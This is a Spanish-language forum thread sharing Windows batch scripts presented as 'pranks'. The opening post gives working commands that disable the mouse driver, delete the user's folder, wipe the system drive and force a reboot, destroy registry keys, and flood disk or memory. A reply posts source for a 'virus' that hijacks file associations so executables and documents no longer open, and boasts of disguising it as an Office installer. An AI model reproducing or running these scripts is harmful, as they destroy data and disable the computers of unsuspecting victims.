[BATCH] Pranks

  • 1 Respuestas
  • 3851 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado 79137913

  • *
  • Co Admin
  • Mensajes: 708
  • Actividad:
    0%
  • Country: 00
  • Reputación 136
  • 4 Esquinas
  • Skype: [email protected]
    • Ver Perfil
    • Doors.Party
    • Email

[BATCH] Pranks

  • en: Junio 04, 2018, 11:53:44 am
HOLA!!!

Les dejo una lista de Pranks (bromas pesadas) en BATCH:

1 Deshabilitar Mouse:
Código: (dos) [Seleccionar]
set key="HKEYLOCALMACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4_

2 Invertir Mouse:
Código: (bash) [Seleccionar]
Rundll32 user32,SwapMouseButton
3 Eliminar toda la carpeta del usuario que corre el script: [PELIGROSO, SIN ARREGLO]
Código: (dos) [Seleccionar]
del /f /q "C:\Users\%userprofile%\*.*"
4 Cambiar hora de la pc:
Código: (dos) [Seleccionar]
time 00:00
5 File Flood:
Código: (dos) [Seleccionar]
:start
echo Hola >>%random%.txt
goto start

6 Romper PC: [PELIGROSO, SIN ARREGLO]
Código: (dos) [Seleccionar]
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

7 Error sos muy tonto, el sitstema se reiniciara para ver si no estas cuando vuelva:
Código: (dos) [Seleccionar]
msg * Error Fatal debido a la idiotez del usuario actual!
shutdown -c “Error! sos muy tonto, el sitstema se apagará para ver si no estás cuando vuelva!” -s -t 10

8 Destruir registro: [PELIGROSO, SIN ARREGLO]
Código: (dos) [Seleccionar]
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MSGX
ECHO Tu pc ha sido destruida, que tengas un gran dia!
GOTO MSGX

9 Ram Overflow con notepads:
Código: (dos) [Seleccionar]
:nuevo
START %SystemRoot%\system32\notepad.exe
GOTO nuevo

GRACIAS POR LEER!!!
« Última modificación: Junio 05, 2018, 09:06:04 pm por Gabriela »
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                   DOORS.PARTY

Desconectado Aincrad

  • *
  • Underc0der
  • Mensajes: 29
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Email

Re:[BATCH] Pranks

  • en: Junio 05, 2018, 08:27:59 pm
UMM INTERESANTE. YO Hice un virus simple que confunde los formatos por medio del registro. la cual causaba q no pudieras correr ningún formato .msi .exe .mp4 . no corría nada ni siquiera el administrador de tareas , ni siquiera el antivirus. bueno probé varios y el único que lo detectaba es el 360 total security realmente es el mejor antivirus q he probado aparte de DR,Web antivirus.

eliminen ese avast , avg , o panda son antivirus Basura.

Para Windows les recomiendo :

360 total security

Para android el mejor antivirus que he encontrado es (puede eliminar esos 50 virus de mi android , he incleso ese maldi** virus llamado Netalpha):

DR,Web antivirus



Bueno me desvíe del tema al que me refería :V . Bueno el virus del que hablaba es este:

Source code (ATENCION :  este virus puede llegar a ser peligroso , si le ponen una linea debilitando el registro y otra linea confundiendo los formatos .bat y otros formatos de ejecución puede a llegar a ser peligroso. (sin reparacion) ):

Código: (dos) [Seleccionar]
@echo off
reg add HKCU\Software\Classes\.VBS /d "htafile" /f
reg add HKCU\Software\Classes\.docx /d "htafile" /f
reg add HKCU\Software\Classes\.pdf /d "htafile" /f
reg add HKCU\Software\Classes\.doc /d "htafile" /f
reg add HKCU\Software\Classes\.mp3 /d "htafile" /f
reg add HKCU\Software\Classes\.mp4 /d "htafile" /f
reg add HKCU\Software\Classes\.EXE /d "htafile" /f
exit

Bueno el virus lo copile y lo disfrace  de Microsoft Ofice 2007 Installer y lo que paso fue que al subirlo al virustotal o a Hibrid Analizis me lo detectaron como RAMSOMWARE Pueden creerlo un simple scrip Batch detectado como ramsomware. "REALMENTE ME CAGUE DE LA RISA  ;D "

Para que vean que no miento (la primera vez que lo subí solo lo detectaban unos 4 de 64 ) :

Analisis de mi virus en virustotal la mayoria lo detecto como "RDN/Ransom" / "Trojan-Ransom.MSIL.Agent.aap"



Algunas imágenes después de abrir el virus :

Intentando abrir el navegador : (Ojo todos los formatos que confundas se abrirán así )







Bueno ahora Viene la solución a esta virus osea el Parche . (No crean que me voy a auto-joder con mi propia creación)

Código: (dos) [Seleccionar]
parche removido
Bueno cuando abran el Parche les pedirá una contraseña que es : 2111995 , Como ven el Ofusque el codigo fuente del Parche con la herramienta BatchCrypt , Perdon por no proporcionar el codigo desofuscado pero lo perdi y me da flojera ponerme a desofuscarlo . :v  :P

« Última modificación: Abril 20, 2019, 10:33:44 am por Aincrad »